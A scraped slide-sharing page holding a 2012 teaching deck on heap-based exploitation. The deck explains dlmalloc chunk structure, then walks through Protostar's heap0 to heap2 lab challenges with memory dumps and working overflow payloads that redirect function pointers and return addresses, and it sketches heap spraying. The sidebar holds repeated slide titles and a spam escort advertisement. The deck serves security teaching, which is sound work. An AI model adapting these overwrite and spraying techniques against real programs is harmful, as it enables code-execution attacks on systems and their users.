Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 

Último (20)

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 

Heap Base Exploitation

  • 1. Scott Hand CSG 2/22/12 HEAP BASED EXPLOITATION
  • 2.  Heap Basics  Overview of Exercise Environment Protostar  Heap0  Heap1  Heap2  Heap3  Heap Spraying  Conclusion WHAT WE WILL COVER…
  • 4.  We know about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down WHAT IS THE HEAP?
  • 5.  glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space MEMORY ALLOCATION DATA STRUCTURES
  • 7.  Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths SOME CONSEQUENCES
  • 8.  We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem MALLOC EXAMPLE
  • 9. FIRST ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
  • 10. SECOND ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
  • 11. THIRD ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
  • 12.  Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); FREE EXAMPLE
  • 13. BEFORE FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
  • 14. AFTER FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 15. AFTER SECOND FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 16. AFTER THIRD FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 17.  Here’s the chunk structure with important parts bolded: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk* fd; struct malloc_chunk* bk; /* Only for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; struct malloc_chunk* bk_nextsize; }; LOOKING AT MALLOC.C…
  • 18.  Looks like, for whatever reason, this machine uses singly linked lists rather than doubly linked lists  We only have the size and fd values to modify SOME OBSERVATIONS
  • 19.  3 Virtual Machines with Challenges  Nebula – Basic exploitation for people with no experience  Protostar – Lots of real-world exploits without some of the modern exploit mitigation systems  Fusion – Advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems.  We will use Protostar. It has 4 heap-based exploitation challenges EXPLOIT-EXERCISES.COM
  • 20.  Heap0 – Basic heap overflow  Heap1 – More complicated overflow  Heap2 – Stale pointers  Heap3 – Heap metadata manipulation HEAP CHALLENGES
  • 22.  Goal – We want to change the function pointer that points to nowinner() to point to winner() instead  Description from author: This level introduces heap overflows and how they can influence code flow. HEAP0 - OVERVIEW
  • 23.  Relevant Code: struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %pn", d, f); strcpy(d->name, argv[1]); f->fp(); HEAP0 - CODE
  • 24. 0x804a000: 0x00000000 0x00000049 0x00000000 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT BEFORE STRCPY d f nowinner()
  • 25. 0x804a000: 0x00000000 0x00000049 0x41414141 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT AFTER STRCPY d f nowinner() “AAAA”
  • 26.  If we overflow the character buffer in d, we can overwrite the function pointer f  The distance from f to d is 0x804a050-0x804a008 = 72  The pointer for winner() is 0x8048464  Python Code: print "A"*72 + "x64x84x04x08" HEAP0 – EXPLOIT CREATION
  • 27. 0x804a000: 0x00000000 0x00000049 0x41414141 0x41414141 0x804a010: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a020: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a030: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a040: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a050: 0x08048464 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – INVALID INPUT AFTER STRCPY d f winner()
  • 29.  Goal – Execute the winner() function again. But it’s not so obvious how this will happen.  There are two allocations and two strcpy commands  There are no function pointers. What should we overwrite?  Description from Author: This level takes a look at code flow hijacking in data overwrite cases. HEAP1 - OVERVIEW
  • 30.  Relevant Code struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]); HEAP1 –CODE
  • 31.  This instruction is the important one: strcpy(i2->name, argv[2]);  We are moving an argument into a pointer stored at i2->name  Can we change the destination of our argument? HEAP1 – EXPLOIT IDEAS
  • 32. 0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT BEFORE STRCPY i1->name i1 i2 i2->name
  • 33. 0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x41414141 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x42424242 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT AFTER STRCPY i1->name = “AAAA”i1 i2 i2->name = “BBBB”
  • 34.  Let’s overflow i1->name to overwrite i2->name’s pointer  Where to point?  Return address!  20 characters of padding “A” characters  Return address is stored at 0xbffff79c  Address of winner() is 0x08048494  Python Code for overflow (i1):  print "A"*20 + "x9cxf7xffxbf"  Shell Code for replacement (i2):  printf "x94x84x04x08"  Final exploit:  `python -c 'print "A"*20 + "x9cxf7xffxbf"'` `printf "x94x84x04x08"` HEAP1 – EXPLOIT CREATION
  • 36.  Goal – According to the problem description, this level is completed when you see the "you have logged in already!" message  Description from Author: This level examines what can happen when heap pointers are stale. HEAP2 - OVERVIEW
  • 37.  For each input loop, the following commands are parsed:  auth  Description: Allocates memory for auth pointer, clears it, then copies the user input into it  Code: auth = malloc(sizeof(auth)); memset(auth, 0, sizeof(auth)); if(strlen(line + 5) < 31) { strcpy(auth->name, line + 5); }  service  Description: Changes the service pointer to a duplicate of the provided input  Code: service = strdup(line + 7); HEAP2 – PROGRAM DESCRIPTION
  • 38.  For each input loop, the following commands are parsed:  reset  Description: Frees the auth pointer  Code: free(auth);  login  Description: Simulates a login. If the auth->auth field is nonzero, then the user is logged in. Otherwise, we get a dummy password prompt.  Code: if(auth->auth) { printf("you have logged in already!n"); } else { printf("please enter your passwordn"); } HEAP2 – PROGRAM DESCRIPTION
  • 39.  This program calls malloc() for auth using sizeof(auth)  sizeof(auth) returns 4 because it’s returning the size of the pointer, not the size of the struct  However, calls to auth->auth still access memory well beyond its allocated 4 bytes HEAP2 – VULNERABILITY
  • 40.  Let’s call “auth CSG” to set up our auth pointer  Then call “service” with a bunch of non-zero garbage  Then, auth->auth will overflow auth’s buffer into service’s buffer and read a non-zero integer.  Python Exploit: print "auth CSGnservice " + "A"*16 + "nlogin" HEAP2 – EXPLOIT
  • 41. HEAP2 – EXPLOIT VISUALIZED What the programmer thinks happened: auth size auth->name auth->auth 0x804c000 0x804c008 0x804c028 service size service data 0x804c030 0x804c038 What actually happened: 0x804c000 0x804c008 auth size 0x804c018 0x804c020 service size service data 0x804c028 auth->name auth->auth auth->auth is non-zero
  • 43.  Try this one on your own  We’ll go over the solution next week HEAP3 – OVERVIEW
  • 45.  The memory allocation algorithm’s tendency towards contiguous chunk placement can be used for evil yet again  In browser, PDF, Flash, etc. exploitation in which the user can control memory allocations (usually via scripting languages like JavaScript), payload placement is usually done on the heap  How do we reliably find our payload in the potentially fragmented heap?  Fill up an entire chunk with NOP sled + payload and spray it repeatedly into the heap  Once the allocator fills in the gaps for the heap fragmentation, we get a nice big contiguous landing area HEAP SPRAYING
  • 47.  Links:  http://www.exploit-exercises.com  https://www.corelan.be/index.php/2011/12/31/exploit-writing- tutorial-part-11-heap-spraying-demystified/  Any questions? CONCLUSION